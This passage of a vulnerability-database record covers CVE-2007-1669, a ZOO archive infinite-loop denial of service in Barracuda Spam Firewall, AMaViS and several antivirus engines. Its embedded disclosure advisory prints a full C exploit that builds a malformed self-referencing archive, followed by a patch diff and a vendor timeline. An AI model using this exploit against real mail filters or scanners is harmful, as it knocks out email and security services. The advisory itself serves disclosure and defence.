          },
          {
            "author": "CNNVD",
            "id": "CNNVD-200705-120",
            "trust": 0.6,
            "value": "HIGH"
          },
          {
            "author": "VULHUB",
            "id": "VHN-25031",
            "trust": 0.1,
            "value": "HIGH"
          }
        ]
      }
    ],
    "sources": [
      {
        "db": "VULHUB",
        "id": "VHN-25031"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2007-001742"
      },
      {
        "db": "NVD",
        "id": "CVE-2007-1669"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-200705-120"
      }
    ]
  },
  "description": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/description#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "zoo decoder 2.10 (zoo-2.10), as used in multiple products including (1) Barracuda Spam Firewall 3.4 and later with virusdef before 2.0.6399, (2) Spam Firewall before 3.4 20070319 with virusdef before 2.0.6399o, and (3) AMaViS 2.4.1 and earlier, allows remote attackers to cause a denial of service (infinite loop) via a ZOO archive with a direntry structure that points to a previous file. (1) Barracuda Spam Firewall Or (2) Spam Firewall ,and (3) AMaViS Used in etc. The Zoo compression algorithm is prone to a remote denial-of-service vulnerability. This issue arises when applications implementing the Zoo algorithm process certain malformed archives. \nA successful attack can exhaust system resources and trigger a denial-of-service condition. \nThis issue affects Zoo 2.10 and other applications implementing the vulnerable algorithm. \n\n----------------------------------------------------------------------\n\nTry a new way to discover vulnerabilities that ALREADY EXIST in your\nIT infrastructure. \n\nJoin the FREE BETA test of the Network Software Inspector (NSI)!\nhttp://secunia.com/network_software_inspector/\n\nThe NSI enables you to INSPECT, DISCOVER, and DOCUMENT\nvulnerabilities in more than 4,000 different Windows applications. \n\nThe vulnerability is caused due to an error in the handling of Zoo\narchives. This can be exploited to cause an infinite loop resulting\nin high CPU utilisation. \n\nSOLUTION:\nUpdate to firmware version 3.4 and virus definition 2.0.6399 or\nlater. \n\nPROVIDED AND/OR DISCOVERED BY:\nJean-Sebastien Guay-Leroux\n\nORIGINAL ADVISORY:\nBarracuda Networks:\nhttp://www.barracudanetworks.com/ns/resources/tech_alert.php\n\nJean-Sebastien Guay-Leroux:\nhttp://www.guay-leroux.com/projects/zoo-infinite-advisory.txt\n\n----------------------------------------------------------------------\n\nAbout:\nThis Advisory was delivered by Secunia as a free service to help\neverybody keeping their systems up to date against the latest\nvulnerabilities. \n\nSubscribe:\nhttp://secunia.com/secunia_security_advisories/\n\nDefinitions: (Criticality, Where etc.)\nhttp://secunia.com/about_secunia_advisories/\n\n\nPlease Note:\nSecunia recommends that you verify all advisories you receive by\nclicking the link. \nSecunia NEVER sends attached files with advisories. \nSecunia does not advise people to install third party patches, only\nuse those supplied by the vendor. \n\n----------------------------------------------------------------------\n\nUnsubscribe: Secunia Security Advisories\nhttp://secunia.com/sec_adv_unsubscribe/?email=packet%40packetstormsecurity.org\n\n----------------------------------------------------------------------\n\n\n. Topic:                  Multiple vendors ZOO file decompression infinite\n                         loop DoS\n\nAnnounced:              2007-05-04\nCredits:                Jean-Sebastien Guay-Leroux\nProducts:               Multiple (see section III)\nImpact:                 DoS (99% CPU utilisation)\nCVE ID:                 CVE-2007-1669, CVE-2007-1670, CVE-2007-1671,\n                         CVE-2007-1672, CVE-2007-1673\n\n\nI.      BACKGROUND\n\nZoo is a compression program and format developed by Rahul Dhesi in the mid\n1980s. The format is based on the LZW compression algorithm and compressed\nfiles are identified by the .zoo file extension. \n\n\nII.  The vulnerability lies in the algorithm used to locate the\nfiles inside the archive.  Each file in a ZOO archive is identified by a\ndirentry structure.  Those structures are linked between themselves with a\n\u0027next\u0027 pointer.  This pointer is in fact an offset from the beginning of\nthe file, representing the next direntry structure.  By specifying an\nalready processed file, it\u0027s possible to process more than one time this\nsame file.  The ZOO parser will then enter an infinite loop condition. \n\n\nIII.    AFFECTED SOFTWARES\n\no Barracuda Spam Firewall\no Panda Software Antivirus\no avast! antivirus\no Avira AntiVir\no zoo-2.10\no unzoo.c\no WinAce\no PicoZip\n\n\nIV.     IMPACT\n\nIf this attack is conducted against a vulnerable antivirus, the host system\nwill have its CPU at 100% utilization and may have problems answering other\nrequests. \n\nIf this attack is conducted against an SMTP content filter running a\nvulnerable ZOO implementation, legitimate clients may be unable to send and\nreceive email through this server. \n\n\nV.      SOLUTION\n\no Barracuda Spam Firewall - CVE-2007-1669:\n   They fixed this problem in virusdef 2.0.6399 for firmware \u003e= 3.4 and\n   2.0.6399o for firmware \u003c 3.4 March 19th 2007. \n\no Panda Software Antivirus - CVE-2007-1670:\n   They fixed this problem April 2nd 2007. \n\no avast! antivirus - CVE-2007-1672:\n   They fixed this problem in version 4.7.981, April 14th 2007. \n\no Avira AntiVir - CVE-2007-1671:\n   They fixed this problem in avpack32.dll version 7.3.0.6 March 22th 2007. \n\no zoo-2.10 - CVE-2007-1669:\n   This software is not maintained anymore.  A patch for version 2.10 is\n   provided in section VII of this advisory because some SMTP content\n   filters may still use this software. \n\no unzoo.c - CVE-2007-1673:\n   This software is not maintained anymore.  No patch is provided for this\n   software. \n\no WinAce was contacted but no response was received from them. \n\no PicoZip was contacted but no response was received from them. \n\n\nVI.     PROOF OF CONCEPT\n\nUsing the PIRANA framework version 0.3.3, available at\nhttp://www.guay-leroux.com , it is possible to test your SMTP server\nagainst this vulnerability. \n\nAlternatively, here is an exploit that will create a file that will trigger\nthe infinite loop condition when it is processed. \n\n/*\n\nExploit for the vulnerability:\nMultiple vendors ZOO file decompression infinite loop DoS\n\ncoded by Jean-S\\xe9bastien Guay-Leroux\nSeptember 2006\n\n*/\n\n#include \u003cstdio.h\u003e\n#include \u003cstdlib.h\u003e\n#include \u003cstring.h\u003e\n\n// Structure of a ZOO header\n\n#define ZOO_HEADER_SIZE         0x0000002a\n\n#define ZH_TEXT                 0\n#define ZH_TAG                  20\n#define ZH_START_OFFSET         24\n#define ZH_NEG_START_OFFSET     28\n#define ZH_MAJ_VER              32\n#define ZH_MIN_VER              33\n#define ZH_ARC_HTYPE            34\n#define ZH_ARC_COMMENT          35\n#define ZH_ARC_COMMENT_LENGTH   39\n#define ZH_VERSION_DATA         41\n\n\n#define D_DIRENTRY_LENGTH       56\n\n#define D_TAG                   0\n#define D_TYPE                  4\n#define D_PACKING_METHOD        5\n#define D_NEXT_ENTRY            6\n#define D_OFFSET                10\n#define D_DATE                  14\n#define D_TIME                  16\n#define D_FILE_CRC              18\n#define D_ORIGINAL_SIZE         20\n#define D_SIZE_NOW              24\n#define D_MAJ_VER               28\n#define D_MIN_VER               29\n#define D_DELETED               30\n#define D_FILE_STRUCT           31\n#define D_COMMENT_OFFSET        32\n#define D_COMMENT_SIZE          36\n#define D_FILENAME              38\n#define D_VAR_DIR_LEN           51\n#define D_TIMEZONE              53\n#define D_DIR_CRC               54\n#define D_NAMLEN                ( D_DIRENTRY_LENGTH + 0 )\n#define D_DIRLEN                ( D_DIRENTRY_LENGTH + 1 )\n#define D_LFILENAME             ( D_DIRENTRY_LENGTH + 2 )\n\n\nvoid put_byte (char *ptr, unsigned char data) {\n         *ptr = data;\n}\n\nvoid put_word (char *ptr, unsigned short data) {\n         put_byte (ptr, data);\n         put_byte (ptr + 1, data \u003e\u003e 8);\n}\n\nvoid put_longword (char *ptr, unsigned long data) {\n         put_byte (ptr, data);\n         put_byte (ptr + 1, data \u003e\u003e 8);\n         put_byte (ptr + 2, data \u003e\u003e 16);\n         put_byte (ptr + 3, data \u003e\u003e 24);\n}\n\nFILE * open_file (char *filename) {\n\n         FILE *fp;\n\n         fp = fopen ( filename , \"w\" );\n\n         if (!fp) {\n                 perror (\"Cant open file\");\n                 exit (1);\n         }\n\n         return fp;\n}\n\nvoid usage (char *progname) {\n\n         printf (\"\\nTo use:\\n\");\n         printf (\"%s \u003carchive name\u003e\\n\\n\", progname);\n\n         exit (1);\n}\n\nint main (int argc, char *argv[]) {\n         FILE *fp;\n         char *hdr = (char *) malloc (4096);\n         char *filename = (char *) malloc (256);\n         int written_bytes;\n         int total_size;\n\n         if ( argc != 2) {\n                 usage ( argv[0] );\n         }\n\n         strncpy (filename, argv[1], 255);\n\n         if (!hdr || !filename) {\n                 perror (\"Error allocating memory\");\n                 exit (1);\n         }\n\n         memset (hdr, 0x00, 4096);\n\n         // Build a ZOO header\n         memcpy          (hdr + ZH_TEXT, \"ZOO 2.10 Archive.\\032\", 18);\n         put_longword    (hdr + ZH_TAG, 0xfdc4a7dc);\n         put_longword    (hdr + ZH_START_OFFSET, ZOO_HEADER_SIZE);\n         put_longword    (hdr + ZH_NEG_START_OFFSET,\n             (ZOO_HEADER_SIZE) * -1);\n         put_byte        (hdr + ZH_MAJ_VER, 2);\n         put_byte        (hdr + ZH_MIN_VER, 0);\n         put_byte        (hdr + ZH_ARC_HTYPE, 1);\n         put_longword    (hdr + ZH_ARC_COMMENT, 0);\n         put_word        (hdr + ZH_ARC_COMMENT_LENGTH, 0);\n         put_byte        (hdr + ZH_VERSION_DATA, 3);\n\n         // Build vulnerable direntry struct\n         put_longword    (hdr + ZOO_HEADER_SIZE + D_TAG, 0xfdc4a7dc);\n         put_byte        (hdr + ZOO_HEADER_SIZE + D_TYPE, 1);\n         put_byte        (hdr + ZOO_HEADER_SIZE + D_PACKING_METHOD, 0);\n         put_longword    (hdr + ZOO_HEADER_SIZE + D_NEXT_ENTRY, 0x2a);\n         put_longword    (hdr + ZOO_HEADER_SIZE + D_OFFSET, 0x71);\n         put_word        (hdr + ZOO_HEADER_SIZE + D_DATE, 0x3394);\n         put_word        (hdr + ZOO_HEADER_SIZE + D_TIME, 0x4650);\n         put_word        (hdr + ZOO_HEADER_SIZE + D_FILE_CRC, 0);\n         put_longword    (hdr + ZOO_HEADER_SIZE + D_ORIGINAL_SIZE, 0);\n         put_longword    (hdr + ZOO_HEADER_SIZE + D_SIZE_NOW, 0);\n         put_byte        (hdr + ZOO_HEADER_SIZE + D_MAJ_VER, 1);\n         put_byte        (hdr + ZOO_HEADER_SIZE + D_MIN_VER, 0);\n         put_byte        (hdr + ZOO_HEADER_SIZE + D_DELETED, 0);\n         put_byte        (hdr + ZOO_HEADER_SIZE + D_FILE_STRUCT, 0);\n         put_longword    (hdr + ZOO_HEADER_SIZE + D_COMMENT_OFFSET, 0);\n         put_word        (hdr + ZOO_HEADER_SIZE + D_COMMENT_SIZE, 0);\n         memcpy          (hdr + ZOO_HEADER_SIZE + D_FILENAME,\n                             \"AAAAAAAA.AAA\", 13);\n\n         total_size = ZOO_HEADER_SIZE + 51;\n\n         fp = open_file (filename);\n\n         if ( (written_bytes = fwrite ( hdr, 1, total_size, fp)) != 0 ) {\n                 printf (\"The file has been written\\n\");\n         } else {\n                 printf (\"Cant write to the file\\n\");\n                 exit (1);\n         }\n\n         fclose (fp);\n\n         return 0;\n}\n\n\nVII.    PATCH\n\nTo fix this issue, ensure that the offset of the next file to process is\nalways greater than the one you are currently processing.  This will\nguarantee the fact that it\u0027s not possible to process the same files over\nand over again.  Here is a patch for the software zoo version 2.10\ndistributed with many UNIX systems:\n\n\ndiff -u zoo/zooext.c zoo-patched/zooext.c\n--- zoo/zooext.c        1991-07-11 15:08:00.000000000 -0400\n+++ zoo-patched/zooext.c        2007-03-16 16:45:28.000000000 -0500\n@@ -89,6 +89,7 @@\n  #endif\n  struct direntry direntry;                 /* directory entry */\n  int first_dir = 1;\n  /* first dir entry seen? */\n+unsigned long zoo_pointer = 0;                     /* Track our position\nin the file */\n\n  static char extract_ver[] = \"Zoo %d.%d is needed to extract %s.\\n\";\n  static char no_space[] = \"Insufficient disk space to extract %s.\\n\";\n@@ -169,6 +170,9 @@\n                 exit_status = 1;\n     }\n     zooseek (zoo_file, zoo_header.zoo_start, 0); /* seek to where data\n     begins */\n+\n+   /* Begin tracking our position in the file */\n+   zoo_pointer = zoo_header.zoo_start;\n  }\n\n  #ifndef PORTABLE\n@@ -597,6 +601,12 @@\n     } /* end if */\n\n  loop_again:\n+\n+   /* Make sure we are not seeking to already processed data */\n+   if (next_ptr \u003c= zoo_pointer)\n+          prterror (\u0027f\u0027, \"ZOO chain structure is corrupted\\n\");\n+   zoo_pointer = next_ptr;\n+\n     zooseek (zoo_file, next_ptr, 0); /* ..seek to next dir entry */\n  } /* end while */\n\ndiff -u zoo/zoolist.c zoo-patched/zoolist.c\n--- zoo/zoolist.c       1991-07-11 15:08:04.000000000 -0400\n+++ zoo-patched/zoolist.c       2007-03-16 16:45:20.000000000 -0500\n@@ -92,6 +92,7 @@\n  int show_mode = 0;                             /* show file protection */\n  #endif\n  int first_dir = 1;                             /* if first direntry -- to\n  adjust dat_ofs */\n+unsigned long zoo_pointer = 0;         /* Track our position in the file\n*/\n\n  while (*option) {\n     switch (*option) {\n@@ -211,6 +212,9 @@\n                 show_acmt (\u0026zoo_header, zoo_file, 0);           /* show\n                 archive comment */\n         }\n\n+   /* Begin tracking our position in the file */\n+   zoo_pointer = zoo_header.zoo_start;\n+\n     /* Seek to the beginning of the first directory entry */\n     if (zooseek (zoo_file, zoo_header.zoo_start, 0) != 0) {\n        ercount++;\n@@ -437,6 +441,11 @@\n           if (verb_list \u0026\u0026 !fast)\n              show_comment (\u0026direntry, zoo_file, 0, (char *) NULL);\n        } /* end if (lots of conditions) */\n+\n+      /* Make sure we are not seeking to already processed data */\n+      if (direntry.next \u003c= zoo_pointer)\n+               prterror (\u0027f\u0027, \"ZOO chain structure is corrupted\\n\");\n+      zoo_pointer = direntry.next;\n\n                 /* ..seek to next dir entry */\n        zooseek (zoo_file, direntry.next, 0);\n\n\nVIII.   CREDITS\n\nJean-Sebastien Guay-Leroux found the bug and wrote the exploit for it. \n\n\nIX.     REFERENCES\n\n1. http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-1669\n\n2. http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-1670\n\n3. http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-1671\n\n4. http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-1672\n\n5. http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-1673\n\n\nX.      HISTORY\n\n2006-09-??  : Vulnerability is found\n2007-03-19  : All vendors notified\n2007-03-19  : Barracuda Networks provided a fix\n2007-03-22  : Avira provided a fix\n2007-04-02  : Panda Antivirus provided a fix\n2007-04-14  : avast! antivirus provided a fix\n2007-05-04  : Public disclosure\n",
    "sources": [
      {
        "db": "NVD",
        "id": "CVE-2007-1669"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2007-001742"
      },
      {
        "db": "BID",
        "id": "23823"
      },
      {
        "db": "VULHUB",
        "id": "VHN-25031"
      },
      {
        "db": "PACKETSTORM",
        "id": "56548"
      },
      {
        "db": "PACKETSTORM",
        "id": "56479"
      }
    ],
    "trust": 2.16
  },
  "exploit_availability": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/exploit_availability#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "reference": "https://www.scap.org.cn/vuln/vhn-25031",
        "trust": 0.1,
        "type": "unknown"
      }
    ],
    "sources": [
      {
        "db": "VULHUB",
        "id": "VHN-25031"
      }
    ]
  },
  "external_ids": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/external_ids#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "db": "NVD",
        "id": "CVE-2007-1669",
        "trust": 2.9
      },
      {
        "db": "BID",
        "id": "23823",
        "trust": 2.0
      },
      {
        "db": "SECUNIA",
        "id": "25122",
        "trust": 1.8
      },
      {
        "db": "SECUNIA",
        "id": "25315",
        "trust": 1.7
      },
      {
        "db": "VUPEN",
        "id": "ADV-2007-1699",
        "trust": 1.7
      },
      {
        "db": "SREASON",
        "id": "2680",
        "trust": 1.7
      },
      {
        "db": "OSVDB",
        "id": "35795",
        "trust": 1.7
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2007-001742",
        "trust": 0.8
      },
      {
        "db": "XF",
        "id": "34080",
        "trust": 0.6
      },
      {
        "db": "BUGTRAQ",
        "id": "20070504 MULTIPLE VENDORS ZOO FILE DECOMPRESSION INFINITE LOOP DOS",
        "trust": 0.6
      },
      {
        "db": "VIM",
        "id": "20070724 ZOO - AMAVIS - BARRACUDA CROSS-REF PROBLEMS",
        "trust": 0.6
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-200705-120",
        "trust": 0.6
      },
      {
        "db": "EXPLOIT-DB",
        "id": "3851",
        "trust": 0.1
      },
      {
        "db": "VULHUB",
        "id": "VHN-25031",
        "trust": 0.1
      },
      {
        "db": "PACKETSTORM",
        "id": "56548",
        "trust": 0.1
      },
      {
        "db": "PACKETSTORM",
        "id": "56479",
        "trust": 0.1
      }
    ],
    "sources": [
      {
        "db": "VULHUB",
        "id": "VHN-25031"
      },
      {
        "db": "BID",
        "id": "23823"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2007-001742"
      },
      {
        "db": "PACKETSTORM",
        "id": "56548"
      },
      {
        "db": "PACKETSTORM",
        "id": "56479"
      },
      {
        "db": "NVD",
        "id": "CVE-2007-1669"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-200705-120"
      }
    ]
  },
  "id": "VAR-200705-0183",
  "iot": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/iot#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": true,
    "sources": [
      {
        "db": "VULHUB",
        "id": "VHN-25031"
      }
    ],
    "trust": 0.01
  },
  "last_update_date": "2023-12-18T12:12:33.927000Z",
  "patch": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/patch#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "title": "Top Page",
        "trust": 0.8,
        "url": "http://amavis.org/"
      },
      {
        "title": "Barracuda Spam \u0026 Virus Firewall",
        "trust": 0.8,
        "url": "http://www.barracudanetworks.com/ns/products/spam_overview.php"
      }
    ],
    "sources": [
      {
        "db": "JVNDB",
        "id": "JVNDB-2007-001742"
      }
    ]
  },
  "problemtype_data": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "problemtype": "NVD-CWE-Other",
        "trust": 1.0
      },
      {
        "problemtype": "CWE-DesignError",
        "trust": 0.8
      }
    ],
    "sources": [
      {
        "db": "JVNDB",
        "id": "JVNDB-2007-001742"
      },
      {
        "db": "NVD",
        "id": "CVE-2007-1669"
      }
    ]
  },
  "references": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/references#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "trust": 1.7,
        "url": "http://www.securityfocus.com/bid/23823"
      },
      {
        "trust": 1.7,
        "url": "http://www.amavis.org/security/asa-2007-2.txt"
      },
      {
        "trust": 1.7,
        "url": "http://www.osvdb.org/35795"
      },
      {
        "trust": 1.7,
        "url": "http://secunia.com/advisories/25122"
      },
      {
        "trust": 1.7,
        "url": "http://secunia.com/advisories/25315"
      },
      {
        "trust": 1.7,
        "url": "http://securityreason.com/securityalert/2680"
      },
      {
        "trust": 1.7,
        "url": "http://www.attrition.org/pipermail/vim/2007-july/001725.html"
      },
      {
        "trust": 1.1,
        "url": "http://www.securityfocus.com/archive/1/467646/100/0/threaded"
      },
      {
        "trust": 1.1,
        "url": "http://www.vupen.com/english/advisories/2007/1699"
      },
      {
        "trust": 1.1,
        "url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/34080"
      },
      {
        "trust": 0.9,
        "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2007-1669"
      },
      {
        "trust": 0.8,
        "url": "http://web.nvd.nist.gov/view/vuln/detail?vulnid=cve-2007-1669"
      },
      {
        "trust": 0.6,
        "url": "http://www.barracudanetworks.com/ns/products/spam_overview.php"
      },
      {
        "trust": 0.6,
        "url": "http://xforce.iss.net/xforce/xfdb/34080"
      },
      {
        "trust": 0.6,
        "url": "http://www.securityfocus.com/archive/1/archive/1/467646/100/0/threaded"
      },
      {
        "trust": 0.6,
        "url": "http://www.frsirt.com/english/advisories/2007/1699"
      },
      {
        "trust": 0.3,
        "url": "http://www.avast.com"
      },
      {
        "trust": 0.3,
        "url": "http://www.avira.com/"
      },
      {
        "trust": 0.3,
        "url": "http://www.pandasoftware.com/"
      },
      {
        "trust": 0.3,
        "url": "http://www.picozip.com/"
      },
      {
        "trust": 0.3,
        "url": "http://www.winace.com/"
      },
      {
        "trust": 0.3,
        "url": "/archive/1/467646"
      },
      {
        "trust": 0.3,
        "url": "http://archives.math.utk.edu/software/multi-platform/gap/util/unzoo.c"
      },
      {
        "trust": 0.1,
        "url": "http://www.barracudanetworks.com/ns/resources/tech_alert.php"
      },
      {
        "trust": 0.1,
        "url": "http://secunia.com/secunia_security_advisories/"
      },
      {
        "trust": 0.1,
        "url": "http://secunia.com/network_software_inspector/"
      },
      {
        "trust": 0.1,
        "url": "http://www.guay-leroux.com/projects/zoo-infinite-advisory.txt"
      },
      {
        "trust": 0.1,
        "url": "http://secunia.com/product/4639/"
      },
      {
        "trust": 0.1,
        "url": "http://secunia.com/advisories/25122/"
      },
      {
        "trust": 0.1,
        "url": "http://secunia.com/sec_adv_unsubscribe/?email=packet%40packetstormsecurity.org"
      },
      {
        "trust": 0.1,
        "url": "http://secunia.com/about_secunia_advisories/"
      },
      {
        "trust": 0.1,
        "url": "http://www.guay-leroux.com"
      },
      {
        "trust": 0.1,
        "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2007-1673"
      },
      {
        "trust": 0.1,
        "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2007-1671"
      },
      {
        "trust": 0.1,
        "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2007-1672"
      },
      {
        "trust": 0.1,
        "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2007-1670"
      }
    ],
    "sources": [
      {
        "db": "VULHUB",
        "id": "VHN-25031"
      },
      {
        "db": "BID",
        "id": "23823"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2007-001742"
      },
      {
        "db": "PACKETSTORM",
        "id": "56548"
      },
      {
        "db": "PACKETSTORM",
        "id": "56479"
      },
      {
        "db": "NVD",
        "id": "CVE-2007-1669"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-200705-120"
      }
    ]
  },
  "sources": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/sources#",
      "data": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "db": "VULHUB",
        "id": "VHN-25031"
      },
      {
        "db": "BID",
        "id": "23823"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2007-001742"
      },
      {
        "db": "PACKETSTORM",
        "id": "56548"
      },
      {
        "db": "PACKETSTORM",
        "id": "56479"
      },
      {
        "db": "NVD",
        "id": "CVE-2007-1669"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-200705-120"
      }
    ]
  },
  "sources_release_date": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
      "data": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "date": "2007-05-09T00:00:00",
        "db": "VULHUB",
        "id": "VHN-25031"
      },
      {
        "date": "2007-05-04T00:00:00",
        "db": "BID",
        "id": "23823"
      },
      {
        "date": "2012-06-26T00:00:00",
        "db": "JVNDB",
        "id": "JVNDB-2007-001742"
      },
      {
        "date": "2007-05-10T00:32:46",
        "db": "PACKETSTORM",
        "id": "56548"
      },
      {
        "date": "2007-05-04T16:51:04",
        "db": "PACKETSTORM",
        "id": "56479"
      },
      {
        "date": "2007-05-09T00:19:00",
        "db": "NVD",
        "id": "CVE-2007-1669"
      },
      {
        "date": "2007-05-08T00:00:00",
        "db": "CNNVD",
        "id": "CNNVD-200705-120"
      }
    ]
  },
  "sources_update_date": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
      "data": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "date": "2018-10-16T00:00:00",
        "db": "VULHUB",
        "id": "VHN-25031"
      },
      {
        "date": "2016-07-06T14:39:00",
        "db": "BID",
        "id": "23823"
      },
      {
        "date": "2012-06-26T00:00:00",
        "db": "JVNDB",
        "id": "JVNDB-2007-001742"
      },
      {
        "date": "2018-10-16T16:40:20.380000",
        "db": "NVD",
        "id": "CVE-2007-1669"
      },
      {
        "date": "2007-05-10T00:00:00",
        "db": "CNNVD",
        "id": "CNNVD-200705-120"
      }
    ]
  },
  "threat_type": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/threat_type#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "remote",
    "sources": [
      {
        "db": "CNNVD",
        "id": "CNNVD-200705-120"
      }
    ],
    "trust": 0.6
  },
  "title": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/title#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "Barracuda Spam Firewall Used in etc.  zoo decoder Service disruption in  (DoS) Vulnerabilities",
    "sources": [
      {
        "db": "JVNDB",
        "id": "JVNDB-2007-001742"
      }
    ],
    "trust": 0.8
  },
  "type": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/type#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "Design Error",
    "sources": [
      {
        "db": "BID",
        "id": "23823"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-200705-120"
      }
    ],
    "trust": 0.9
  }
}

Tags

Taxonomy of the tags.

All sightings related to this event Export sightings related to this event

Sightings

Author	Source	Type	Date

Nomenclature

Seen: The vulnerability was mentioned, discussed, or observed by the user.
Confirmed: The vulnerability has been validated from an analyst's perspective.
Published Proof of Concept: A public proof of concept is available for this vulnerability.
Exploited: The vulnerability was observed as exploited by the user who reported the sighting.
Patched: The vulnerability was observed as successfully patched by the user who reported the sighting.
Not exploited: The vulnerability was not observed as exploited by the user who reported the sighting.
Not confirmed: The user expressed doubt about the validity of the vulnerability.
Not patched: The vulnerability was not observed as successfully patched by the user who reported the sighting.

Detection rules are retrieved from Rulezet.

Action not permitted

CVE-2007-1669 (GCVE-0-2007-1669)

CERTA-2007-AVI-212

Description

Solution

CERTA-2007-AVI-212

Description

Solution

GSD-2007-1669

GHSA-XQXC-R4XH-RX35

FKIE_CVE-2007-1669

OPENSUSE-SU-2024:10445-1

VAR-200705-0183

include

include

include

define ZOO_HEADER_SIZE 0x0000002a

define ZH_TEXT 0

define ZH_TAG 20

define ZH_START_OFFSET 24

define ZH_NEG_START_OFFSET 28

define ZH_MAJ_VER 32

define ZH_MIN_VER 33

define ZH_ARC_HTYPE 34

define ZH_ARC_COMMENT 35

define ZH_ARC_COMMENT_LENGTH 39

define ZH_VERSION_DATA 41

define D_DIRENTRY_LENGTH 56

define D_TAG 0

define D_TYPE 4

define D_PACKING_METHOD 5

define D_NEXT_ENTRY 6

define D_OFFSET 10

define D_DATE 14

define D_TIME 16

define D_FILE_CRC 18

define D_ORIGINAL_SIZE 20

define D_SIZE_NOW 24

define D_MAJ_VER 28

define D_MIN_VER 29

define D_DELETED 30

define D_FILE_STRUCT 31

define D_COMMENT_OFFSET 32

define D_COMMENT_SIZE 36

define D_FILENAME 38

define D_VAR_DIR_LEN 51

define D_TIMEZONE 53

define D_DIR_CRC 54

define D_NAMLEN ( D_DIRENTRY_LENGTH + 0 )

define D_DIRLEN ( D_DIRENTRY_LENGTH + 1 )

define D_LFILENAME ( D_DIRENTRY_LENGTH + 2 )

Tags

Sightings

Nomenclature